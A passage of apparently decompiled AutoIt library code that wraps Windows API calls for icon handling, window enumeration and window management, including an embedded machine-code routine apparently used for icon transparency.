= _WINAPI_CREATERECT (0 , 0 , $IWIDTH , $IHEIGHT ) _WINAPI_FILLRECT ($HDC , $TRECT , $HBRUSH ) _WINAPI_DELETEOBJECT ($HBRUSH ) _WINAPI_SELECTOBJECT ($HDC , $HSV ) _WINAPI_DELETEDC ($HDC ) LOCAL $HICON = _WINAPI_CREATEICONINDIRECT ($HXOR , $HAND ) LOCAL $IERROR = @ERROR IF $HXOR THEN _WINAPI_DELETEOBJECT ($HXOR ) ENDIF IF $HAND THEN _WINAPI_DELETEOBJECT ($HAND ) ENDIF IF NOT $HICON THEN RETURN SETERROR ($IERROR + 10 , 0 , 0 ) RETURN $HICON ENDFUNC FUNC _WINAPI_CREATEICON ($HINSTANCE , $IWIDTH , $IHEIGHT , $IPLANES , $IBITSPIXEL , $PANDBITS , $PXORBITS ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CreateIcon" , "handle" , $HINSTANCE , "int" , $IWIDTH , "int" , $IHEIGHT , "byte" , $IPLANES , "byte" , $IBITSPIXEL , "struct*" , $PANDBITS , "struct*" , $PXORBITS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEICONFROMRESOURCEEX ($PDATA , $ISIZE , $BICON = TRUE , $IXDESIREDPIXELS = 0 , $IYDESIREDPIXELS = 0 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CreateIconFromResourceEx" , "ptr" , $PDATA , "dword" , $ISIZE , "bool" , $BICON , "dword" , 196608 , "int" , $IXDESIREDPIXELS , "int" , $IYDESIREDPIXELS , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEICONINDIRECT ($HBITMAP , $HMASK , $IXHOTSPOT = 0 , $IYHOTSPOT = 0 , $BICON = TRUE ) LOCAL $TICONINFO = DLLSTRUCTCREATE ($TAGICONINFO ) DLLSTRUCTSETDATA ($TICONINFO , 1 , $BICON ) DLLSTRUCTSETDATA ($TICONINFO , 2 , $IXHOTSPOT ) DLLSTRUCTSETDATA ($TICONINFO , 3 , $IYHOTSPOT ) DLLSTRUCTSETDATA ($TICONINFO , 4 , $HMASK ) DLLSTRUCTSETDATA ($TICONINFO , 5 , $HBITMAP ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CreateIconIndirect" , "struct*" , $TICONINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DESTROYICON ($HICON ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DestroyIcon" , "handle" , $HICON ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_EXTRACTICON ($SICON , $IINDEX , $BSMALL = FALSE ) LOCAL $PLARGE , $PSMALL , $TPTR = DLLSTRUCTCREATE ("ptr" ) IF $BSMALL THEN $PLARGE = 0 $PSMALL = DLLSTRUCTGETPTR ($TPTR ) ELSE $PLARGE = DLLSTRUCTGETPTR ($TPTR ) $PSMALL = 0 ENDIF DLLCALL ("shell32.dll" , "uint" , "ExtractIconExW" , "wstr" , $SICON , "int" , $IINDEX , "ptr" , $PLARGE , "ptr" , $PSMALL , "uint" , 1 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPTR , 1 ) ENDFUNC FUNC _WINAPI_EXTRACTICONEX ($SFILEPATH , $IINDEX , $PALARGE , $PASMALL , $IICONS ) LOCAL $ARESULT = DLLCALL ("shell32.dll" , "uint" , "ExtractIconExW" , "wstr" , $SFILEPATH , "int" , $IINDEX , "struct*" , $PALARGE , "struct*" , $PASMALL , "uint" , $IICONS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FILEICONINIT ($BRESTORE = TRUE ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , 660 , "int" , $BRESTORE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_GETICONDIMENSION ($HICON ) LOCAL $TICONINFO = DLLSTRUCTCREATE ($TAGICONINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfo" , "handle" , $HICON , "struct*" , $TICONINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TSIZE = _WINAPI_GETBITMAPDIMENSION (DLLSTRUCTGETDATA ($TICONINFO , 5 ) ) FOR $I = 4 TO 5 _WINAPI_DELETEOBJECT (DLLSTRUCTGETDATA ($TICONINFO , $I ) ) NEXT IF NOT ISDLLSTRUCT ($TSIZE ) THEN RETURN SETERROR (20 , 0 , 0 ) RETURN $TSIZE ENDFUNC FUNC _WINAPI_GETICONINFO ($HICON ) LOCAL $TINFO = DLLSTRUCTCREATE ($TAGICONINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfo" , "handle" , $HICON , "struct*" , $TINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $AICON [6 ] $AICON [0 ] = TRUE $AICON [1 ] = DLLSTRUCTGETDATA ($TINFO , "Icon" ) <> 0 $AICON [2 ] = DLLSTRUCTGETDATA ($TINFO , "XHotSpot" ) $AICON [3 ] = DLLSTRUCTGETDATA ($TINFO , "YHotSpot" ) $AICON [4 ] = DLLSTRUCTGETDATA ($TINFO , "hMask" ) $AICON [5 ] = DLLSTRUCTGETDATA ($TINFO , "hColor" ) RETURN $AICON ENDFUNC FUNC _WINAPI_GETICONINFOEX ($HICON ) LOCAL $TIIEX = DLLSTRUCTCREATE ("dword;int;dword;dword;ptr;ptr;ushort;wchar[260];wchar[260]" ) DLLSTRUCTSETDATA ($TIIEX , 1 , DLLSTRUCTGETSIZE ($TIIEX ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfoExW" , "handle" , $HICON , "struct*" , $TIIEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [8 ] FOR $I = 0 TO 7 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TIIEX , $I + 2 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_LOADICON ($HINSTANCE , $SNAME ) LOCAL $STYPEOFNAME = "int" IF ISSTRING ($SNAME ) THEN $STYPEOFNAME = "wstr" ENDIF LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "LoadIconW" , "handle" , $HINSTANCE , $STYPEOFNAME , $SNAME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_LOADICONMETRIC ($HINSTANCE , $SNAME , $IMETRIC ) LOCAL $STYPEOFNAME = "int" IF ISSTRING ($SNAME ) THEN $STYPEOFNAME = "wstr" ENDIF LOCAL $ARET = DLLCALL ("comctl32.dll" , "long" , "LoadIconMetric" , "handle" , $HINSTANCE , $STYPEOFNAME , $SNAME , "int" , $IMETRIC , "handle*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [4 ] ENDFUNC FUNC _WINAPI_LOADICONWITHSCALEDOWN ($HINSTANCE , $SNAME , $IWIDTH , $IHEIGHT ) LOCAL $STYPEOFNAME = "int" IF ISSTRING ($SNAME ) THEN $STYPEOFNAME = "wstr" ENDIF LOCAL $ARET = DLLCALL ("comctl32.dll" , "long" , "LoadIconWithScaleDown" , "handle" , $HINSTANCE , $STYPEOFNAME , $SNAME , "int" , $IWIDTH , "int" , $IHEIGHT , "handle*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [5 ] ENDFUNC FUNC _WINAPI_LOADSHELL32ICON ($IICONID ) LOCAL $TICONS = DLLSTRUCTCREATE ("ptr Data" ) LOCAL $IICONS = _WINAPI_EXTRACTICONEX ("shell32.dll" , $IICONID , 0 , $TICONS , 1 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $IICONS <= 0 THEN RETURN SETERROR (10 , 0 , 0 ) RETURN DLLSTRUCTGETDATA ($TICONS , "Data" ) ENDFUNC FUNC _WINAPI_LOOKUPICONIDFROMDIRECTORYEX ($PDATA , $BICON = TRUE , $IXDESIREDPIXELS = 0 , $IYDESIREDPIXELS = 0 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "LookupIconIdFromDirectoryEx" , "ptr" , $PDATA , "bool" , $BICON , "int" , $IXDESIREDPIXELS , "int" , $IYDESIREDPIXELS , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_MIRRORICON ($HICON , $BDELETE = FALSE ) IF NOT $BDELETE THEN $HICON = _WINAPI_COPYICON ($HICON ) ENDIF LOCAL $ARET = DLLCALL ("comctl32.dll" , "int" , 414 , "ptr" , 0 , "ptr*" , $HICON ) IF @ERROR OR NOT $ARET [0 ] THEN LOCAL $IERROR = @ERROR + 10 IF $HICON AND NOT $BDELETE THEN _WINAPI_DESTROYICON ($HICON ) ENDIF RETURN SETERROR ($IERROR , 0 , 0 ) ENDIF RETURN $ARET [2 ] ENDFUNC #EndRegion Public Functions #Region Embedded DLL Functions FUNC __TRANSPARENCYPROC () STATIC $PPROC = 0 IF NOT $PPROC THEN IF @AUTOITX64 THEN $PPROC = __INIT (BINARY ("0x48894C240848895424104C894424184C894C24205541574831C0505050505050" & "4883EC284883BC24800000000074054831C0EB0748C7C0010000004821C07522" & "488BAC248000000048837D180074054831C0EB0748C7C0010000004821C07502" & "EB0948C7C001000000EB034831C04821C0740B4831C04863C0E93C0100004C63" & "7C24784983FF647E0F48C7C0010000004863C0E9220100004C637C24784D21FF" & "7D08C74424780000000048C74424280100000048C74424300000000048C74424" & "3800000000488BAC24800000004C637D04488BAC2480000000486345084C0FAF" & "F849C1E7024983C7FC4C3B7C24380F8C88000000488BAC24800000004C8B7D18" & "4C037C24384983C7034C897C2440488B6C2440480FB64500505888442448807C" & "244800744B4C0FB67C244848634424784C0FAFF84C89F848C7C1640000004899" & "48F7F94989C74C89F850488B6C244858884500488B6C2440807D0000740948C7" & "4424280000000048C7442430010000004883442438040F8149FFFFFF48837C24" & "3000741148837C242800740948C7C001000000EB034831C04821C0740E48C7C0" & "FFFFFFFF4863C0EB11EB0C48C7C0010000004863C0EB034831C04883C458415F" & "5DC3" ) ) ELSE $PPROC = __INIT (BINARY ("0x555331C05050505050837C242800740431C0EB05B80100000021C075198B6C24" & "28837D1400740431C0EB05B80100000021C07502EB07B801000000EB0231C021" & "C0740731C0E9E50000008B5C242483FB647E0AB801000000E9D20000008B5C24" & "2421DB7D08C744242400000000C7042401000000C744240400000000C7442408" & "000000008B6C24288B5D048B6C24280FAF5D08C1E30283C3FC3B5C24087C648B" & "6C24288B5D14035C240883C303895C240C8B6C240C0FB6450088442410807C24" & "100074380FB65C24100FAF5C242489D8B96400000099F7F989C3538B6C241058" & "8845008B6C240C807D00007407C7042400000000C74424040100000083442408" & "047181837C240400740D833C24007407B801000000EB0231C021C07409B8FFFF" & "FFFFEB0BEB07B801000000EB0231C083C4145B5DC21000" ) ) ENDIF ENDIF RETURN $PPROC ENDFUNC #EndRegion Embedded DLL Functions FUNC _SENDMESSAGE ($HWND , $IMSG , $WPARAM = 0 , $LPARAM = 0 , $IRETURN = 0 , $WPARAMTYPE = "wparam" , $LPARAMTYPE = "lparam" , $SRETURNTYPE = "lresult" ) LOCAL $ARESULT = DLLCALL ("user32.dll" , $SRETURNTYPE , "SendMessageW" , "hwnd" , $HWND , "uint" , $IMSG , $WPARAMTYPE , $WPARAM , $LPARAMTYPE , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $IRETURN >= 0 AND $IRETURN <= 4 THEN RETURN $ARESULT [$IRETURN ] RETURN $ARESULT ENDFUNC FUNC _SENDMESSAGEA ($HWND , $IMSG , $WPARAM = 0 , $LPARAM = 0 , $IRETURN = 0 , $WPARAMTYPE = "wparam" , $LPARAMTYPE = "lparam" , $SRETURNTYPE = "lresult" ) LOCAL $ARESULT = DLLCALL ("user32.dll" , $SRETURNTYPE , "SendMessageA" , "hwnd" , $HWND , "uint" , $IMSG , $WPARAMTYPE , $WPARAM , $LPARAMTYPE , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $IRETURN >= 0 AND $IRETURN <= 4 THEN RETURN $ARESULT [$IRETURN ] RETURN $ARESULT ENDFUNC #Region Global Variables and Constants GLOBAL $__G_AINPROCESS_WINAPI [64 ] [2 ] = [[0 , 0 ] ] GLOBAL $__G_AWINLIST_WINAPI [64 ] [2 ] = [[0 , 0 ] ] GLOBAL CONST $GW_HWNDFIRST = 0 GLOBAL CONST $GW_HWNDLAST = 1 GLOBAL CONST $GW_HWNDNEXT = 2 GLOBAL CONST $GW_HWNDPREV = 3 GLOBAL CONST $GW_OWNER = 4 GLOBAL CONST $GW_CHILD = 5 GLOBAL CONST $GW_ENABLEDPOPUP = 6 GLOBAL CONST $GWL_WNDPROC = 4294967292 GLOBAL CONST $GWL_HINSTANCE = 4294967290 GLOBAL CONST $GWL_HWNDPARENT = 4294967288 GLOBAL CONST $GWL_ID = 4294967284 GLOBAL CONST $GWL_STYLE = 4294967280 GLOBAL CONST $GWL_EXSTYLE = 4294967276 GLOBAL CONST $GWL_USERDATA = 4294967275 GLOBAL CONST $__WINAPICONSTANT_WM_SETFONT = 48 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CREATEWINDOWEX ($IEXSTYLE , $SCLASS , $SNAME , $ISTYLE , $IX , $IY , $IWIDTH , $IHEIGHT , $HPARENT , $HMENU = 0 , $HINSTANCE = 0 , $PPARAM = 0 ) IF $HINSTANCE = 0 THEN $HINSTANCE = _WINAPI_GETMODULEHANDLE ("" ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "CreateWindowExW" , "dword" , $IEXSTYLE , "wstr" , $SCLASS , "wstr" , $SNAME , "dword" , $ISTYLE , "int" , $IX , "int" , $IY , "int" , $IWIDTH , "int" , $IHEIGHT , "hwnd" , $HPARENT , "handle" , $HMENU , "handle" , $HINSTANCE , "struct*" , $PPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETCLIENTRECT ($HWND ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetClientRect" , "hwnd" , $HWND , "struct*" , $TRECT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_GETDESKTOPWINDOW () LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetDesktopWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DESTROYWINDOW ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DestroyWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ENABLEWINDOW ($HWND , $BENABLE = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "EnableWindow" , "hwnd" , $HWND , "bool" , $BENABLE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ENUMWINDOWS ($BVISIBLE = TRUE , $HWND = DEFAULT ) __WINAPI_ENUMWINDOWSINIT () IF $HWND = DEFAULT THEN $HWND = _WINAPI_GETDESKTOPWINDOW () __WINAPI_ENUMWINDOWSCHILD ($HWND , $BVISIBLE ) RETURN $__G_AWINLIST_WINAPI ENDFUNC FUNC _WINAPI_ENUMWINDOWSPOPUP () __WINAPI_ENUMWINDOWSINIT () LOCAL $HWND = _WINAPI_GETWINDOW (_WINAPI_GETDESKTOPWINDOW () , $GW_CHILD ) LOCAL $SCLASS WHILE $HWND <> 0 IF _WINAPI_ISWINDOWVISIBLE ($HWND ) THEN $SCLASS = _WINAPI_GETCLASSNAME ($HWND ) IF $SCLASS = "#32768" THEN __WINAPI_ENUMWINDOWSADD ($HWND ) ELSEIF $SCLASS = "ToolbarWindow32" THEN __WINAPI_ENUMWINDOWSADD ($HWND ) ELSEIF $SCLASS = "ToolTips_Class32" THEN __WINAPI_ENUMWINDOWSADD ($HWND ) ELSEIF $SCLASS = "BaseBar" THEN __WINAPI_ENUMWINDOWSCHILD ($HWND ) ENDIF ENDIF $HWND = _WINAPI_GETWINDOW ($HWND , $GW_HWNDNEXT ) WEND RETURN $__G_AWINLIST_WINAPI ENDFUNC FUNC _WINAPI_ENUMWINDOWSTOP () __WINAPI_ENUMWINDOWSINIT () LOCAL $HWND = _WINAPI_GETWINDOW (_WINAPI_GETDESKTOPWINDOW () , $GW_CHILD ) WHILE $HWND <> 0 IF _WINAPI_ISWINDOWVISIBLE ($HWND ) THEN __WINAPI_ENUMWINDOWSADD ($HWND ) $HWND = _WINAPI_GETWINDOW ($HWND , $GW_HWNDNEXT ) WEND RETURN $__G_AWINLIST_WINAPI ENDFUNC FUNC _WINAPI_GETCLASSNAME ($HWND ) IF NOT ISHWND ($HWND ) THEN $HWND = GUICTRLGETHANDLE ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetClassNameW" , "hwnd" , $HWND , "wstr" , "" , "int" , 4096 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARESULT [0 ] , $ARESULT [2 ] ) ENDFUNC FUNC _WINAPI_GETFOCUS () LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetFocus" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETPARENT ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetParent" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETSYSCOLOR ($IINDEX ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "INT" , "GetSysColor" , "int" , $IINDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETSYSTEMMETRICS ($IINDEX ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetSystemMetrics" , "int" , $IINDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETWINDOW ($HWND , $ICMD ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetWindow" , "hwnd" , $HWND , "uint" , $ICMD ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETWINDOWHEIGHT ($HWND ) LOCAL $TRECT = _WINAPI_GETWINDOWRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Bottom" ) - DLLSTRUCTGETDATA ($TRECT , "Top" ) ENDFUNC FUNC _WINAPI_GETWINDOWLONG ($HWND , $IINDEX ) LOCAL $SFUNCNAME = "GetWindowLongW" IF @AUTOITX64 THEN $SFUNCNAME = "GetWindowLongPtrW" LOCAL $ARESULT = DLLCALL ("user32.dll" , "long_ptr" , $SFUNCNAME , "hwnd" , $HWND , "int" , $IINDEX ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETWINDOWRECT ($HWND ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowRect" , "hwnd" , $HWND , "struct*" , $TRECT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_GETWINDOWTEXT ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetWindowTextW" , "hwnd" , $HWND , "wstr" , "" , "int" , 4096 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN SETEXTENDED ($ARESULT [0 ] , $ARESULT [2 ] ) ENDFUNC FUNC _WINAPI_GETWINDOWTHREADPROCESSID ($HWND , BYREF $IPID ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "dword" , "GetWindowThreadProcessId" , "hwnd" , $HWND , "dword*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) $IPID = $ARESULT [2 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETWINDOWWIDTH ($HWND ) LOCAL $TRECT = _WINAPI_GETWINDOWRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Right" ) - DLLSTRUCTGETDATA ($TRECT , "Left" ) ENDFUNC FUNC _WINAPI_INPROCESS ($HWND , BYREF $HLASTWND ) IF $HWND = $HLASTWND THEN RETURN TRUE FOR $II = $__G_AINPROCESS_WINAPI [0 ] [0 ] TO 1 STEP + 4294967295 IF $HWND = $__G_AINPROCESS_WINAPI [$II ] [0 ] THEN IF $__G_AINPROCESS_WINAPI [$II ] [1 ] THEN $HLASTWND = $HWND RETURN TRUE ELSE RETURN FALSE ENDIF ENDIF NEXT LOCAL $IPID _WINAPI_GETWINDOWTHREADPROCESSID ($HWND , $IPID ) LOCAL $ICOUNT = $__G_AINPROCESS_WINAPI [0 ] [0 ] + 1 IF $ICOUNT >= 64 THEN $ICOUNT = 1 $__G_AINPROCESS_WINAPI [0 ] [0 ] = $ICOUNT $__G_AINPROCESS_WINAPI [$ICOUNT ] [0 ] = $HWND $__G_AINPROCESS_WINAPI [$ICOUNT ] [1 ] = ($IPID = @AUTOITPID ) RETURN $__G_AINPROCESS_WINAPI [$ICOUNT ] [1 ] ENDFUNC FUNC _WINAPI_INVALIDATERECT ($HWND , $TRECT = 0 , $BERASE = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "InvalidateRect" , "hwnd" , $HWND , "struct*" , $TRECT , "bool" , $BERASE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ISCLASSNAME ($HWND , $SCLASSNAME ) LOCAL $SSEPARATOR = OPT ("GUIDataSeparatorChar" ) LOCAL $ACLASSNAME = STRINGSPLIT ($SCLASSNAME , $SSEPARATOR ) IF NOT ISHWND ($HWND ) THEN $HWND = GUICTRLGETHANDLE ($HWND ) LOCAL $SCLASSCHECK = _WINAPI_GETCLASSNAME ($HWND ) FOR $X = 1 TO UBOUND ($ACLASSNAME ) + 4294967295 IF STRINGUPPER (STRINGMID ($SCLASSCHECK , 1 , STRINGLEN ($ACLASSNAME [$X ] ) ) ) = STRINGUPPER ($ACLASSNAME [$X ] ) THEN RETURN TRUE NEXT RETURN FALSE ENDFUNC FUNC _WINAPI_ISWINDOW ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "IsWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ISWINDOWVISIBLE ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "IsWindowVisible" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_MOVEWINDOW ($HWND , $IX , $IY , $IWIDTH , $IHEIGHT , $BREPAINT = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "MoveWindow" , "hwnd" , $HWND , "int" , $IX , "int" , $IY , "int" , $IWIDTH , "int" , $IHEIGHT , "bool" , $BREPAINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETFOCUS ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "SetFocus" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETFONT ($HWND , $HFONT , $BREDRAW = TRUE ) _SENDMESSAGE ($HWND , $__WINAPICONSTANT_WM_SETFONT , $HFONT , $BREDRAW , 0 , "hwnd" ) ENDFUNC FUNC _WINAPI_SETPARENT ($HWNDCHILD , $HWNDPARENT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "SetParent" , "hwnd" , $HWNDCHILD , "hwnd" , $HWNDPARENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWPOS ($HWND , $HAFTER , $IX , $IY , $ICX , $ICY , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetWindowPos" , "hwnd" , $HWND , "hwnd" , $HAFTER , "int" , $IX , "int" , $IY , "int" , $ICX , "int" , $ICY , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWTEXT ($HWND , $STEXT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetWindowTextW" , "hwnd" , $HWND , "wstr" , $STEXT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SHOWWINDOW ($HWND , $ICMDSHOW = 5 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "ShowWindow" , "hwnd" , $HWND , "int" , $ICMDSHOW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_UPDATEWINDOW ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "UpdateWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __WINAPI_ENUMWINDOWSADD ($HWND , $SCLASS = "" ) IF $SCLASS = "" THEN $SCLASS = _WINAPI_GETCLASSNAME ($HWND ) $__G_AWINLIST_WINAPI [0 ] [0 ] += 1 LOCAL $ICOUNT = $__G_AWINLIST_WINAPI [0 ] [0 ] IF $ICOUNT >= $__G_AWINLIST_WINAPI [0 ] [1 ] THEN REDIM $__G_AWINLIST_WINAPI [$ICOUNT + 64 ] [2 ] $__G_AWINLIST_WINAPI [0 ] [1 ] += 64 ENDIF $__G_AWINLIST_WINAPI [$ICOUNT ] [0 ] = $HWND $__G_AWINLIST_WINAPI [$ICOUNT ] [1 ] = $SCLASS ENDFUNC FUNC __WINAPI_ENUMWINDOWSCHILD ($HWND , $BVISIBLE = TRUE ) $HWND = _WINAPI_GETWINDOW ($HWND , $GW_CHILD ) WHILE $HWND <> 0 IF (NOT $BVISIBLE ) OR _WINAPI_ISWINDOWVISIBLE ($HWND ) THEN __WINAPI_ENUMWINDOWSADD ($HWND ) __WINAPI_ENUMWINDOWSCHILD ($HWND , $BVISIBLE ) ENDIF $HWND = _WINAPI_GETWINDOW ($HWND , $GW_HWNDNEXT ) WEND ENDFUNC FUNC __WINAPI_ENUMWINDOWSINIT () REDIM $__G_AWINLIST_WINAPI [64 ] [2 ] $__G_AWINLIST_WINAPI [0 ] [0 ] = 0 $__G_AWINLIST_WINAPI [0 ] [1 ] = 64 ENDFUNC #EndRegion Internal Functions GLOBAL CONST $FLASHW_CAPTION = 1 GLOBAL CONST $FLASHW_TRAY = 2 GLOBAL CONST $FLASHW_TIMER = 4 GLOBAL CONST $FLASHW_TIMERNOFG = 12 GLOBAL CONST $TAGUPDATELAYEREDWINDOWINFO = "dword Size;hwnd hDstDC;long DstX;long DstY;long cX;long cY;hwnd hSrcDC;long SrcX;long 